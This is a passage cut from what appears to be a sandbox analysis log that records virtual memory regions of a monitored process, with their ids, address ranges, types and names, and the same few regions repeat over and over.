0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 11771 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 11772 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 11773 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 11774 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 11775 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 11776 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 11777 start_va = 0x530000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 11778 start_va = 0x3cf0000 end_va = 0x3d0bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003cf0000" filename = "" Region: id = 11779 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 11780 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 11781 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 11782 start_va = 0x2370000 end_va = 0x237ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002370000" filename = "" Region: id = 11783 start_va = 0x3cf0000 end_va = 0x3d0bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003cf0000" filename = "" Region: id = 11784 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 11785 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 11786 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 11787 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 11788 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 11789 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 11790 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 11791 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 11792 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 11793 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 11794 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 11795 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 11796 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 11797 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 11798 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 11799 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 11800 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 11801 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 11802 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 11803 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 11804 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 11805 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 11806 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 11807 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 11808 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 11809 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 11810 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 11811 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 11812 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 11813 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 11814 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 11815 start_va = 0x530000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 11816 start_va = 0x3cf0000 end_va = 0x3d0bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003cf0000" filename = "" Region: id = 11817 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 11818 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 11819 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 11820 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 11821 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 11822 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 11823 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 11824 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 11825 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 11826 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 11827 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 11828 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 11829 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 11830 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 11831 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 11832 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 11833 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 11834 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 11835 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 11836 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 11837 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 11838 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 11839 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 11840 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 11841 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 11842 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 11843 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 11844 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 11845 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 11846 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 11847 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 11848 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 11849 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 11850 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 11851 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 11852 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 11853 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 11854 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 11855 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 11856 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 11857 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 11858 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 11859 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 11860 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 11861 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 11862 start_va = 0x2370000 end_va = 0x237ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002370000" filename = "" Region: id = 11863 start_va = 0x3cf0000 end_va = 0x3d0bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003cf0000" filename = "" Region: id = 11864 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 11865 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 11866 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 11867 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 11868 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 11869 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 11870 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 11871 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 11872 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 11873 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 11874 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 11875 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 11876 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 11877 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 11878 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 11879 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 11880 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 11881 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 11882 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 11883 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 11884 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 11885 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 11886 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 11887 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 11888 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 11889 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 11890 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 11891 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 11892 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 11893 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 11894 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 11895 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 11896 start_va = 0x530000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 11897 start_va = 0x3cf0000 end_va = 0x3d0bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003cf0000" filename = "" Region: id = 11898 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 11899 start_va = 0x530000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 11900 start_va = 0x3cf0000 end_va = 0x3d0bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003cf0000" filename = "" Region: id = 11901 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 11902 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 11903 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 11904 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 11905 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 11906 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 11907 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 11908 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 11909 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 11910 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 11911 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 11912 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 11913 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 11914 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 11915 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 11916 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 11917 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 11918 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 11919 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 11920 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 11921 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 11922 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 11923 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 11924 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 11925 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 11926 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 11927 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 11928 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 11929 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 11930 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 11931 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 11932 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 11933 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 11934 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 11935 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 11936 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 11937 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 11938 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 11939 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 11940 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 11941 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 11942 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 11943 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 11944 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 11945 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 11946 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 11947 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 11948 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 11949 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 11950 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 11951 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 11952 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 11953 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 11954 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 11955 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 11956 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 11957 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" 